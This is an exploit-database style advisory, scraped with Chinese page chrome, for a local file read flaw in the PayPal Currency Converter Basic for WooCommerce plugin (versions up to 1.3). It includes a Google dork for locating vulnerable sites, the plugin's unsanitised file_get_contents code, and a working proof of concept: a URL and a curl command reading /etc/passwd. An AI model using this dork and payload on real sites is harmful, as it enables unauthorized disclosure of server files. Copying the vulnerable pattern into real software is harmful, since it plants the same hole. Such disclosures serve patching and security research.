扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read # Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce" # Date: 10/06/2015 # Exploit Author: Kuroi'SH # Software Link: <blockquote class="wp-embedded-content" data-secret="EMItRUlcQ8"><a href="https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/" target="_blank"rel="external nofollow" class="external" >PayPal Currency Converter BASIC for WooCommerce</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“PayPal Currency Converter BASIC for WooCommerce” — Plugin Directory" src="https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/embed/#?secret=q71Wfztkco#?secret=EMItRUlcQ8" data-secret="EMItRUlcQ8" frameborder="0" marginmarginscrolling="no"></iframe> # Version: <=1.3 # Tested on: Linux Description: proxy.php's code: <?php $file = file_get_contents($_GET['requrl']); $left=strpos($file,'<div id=currency_converter_result>'); $right=strlen($file)-strpos($file,'<input type=hidden name=meta'); $snip= substr($file,$left,$right); echo $snip; ?> Based on user input, the content of a file is printed out (unfortunately not included) so any html file can be loaded, and an attacker may be able to readany local file which is not executed in the server. Example: http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd POC: curl --silent --url http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd |
体验盒子
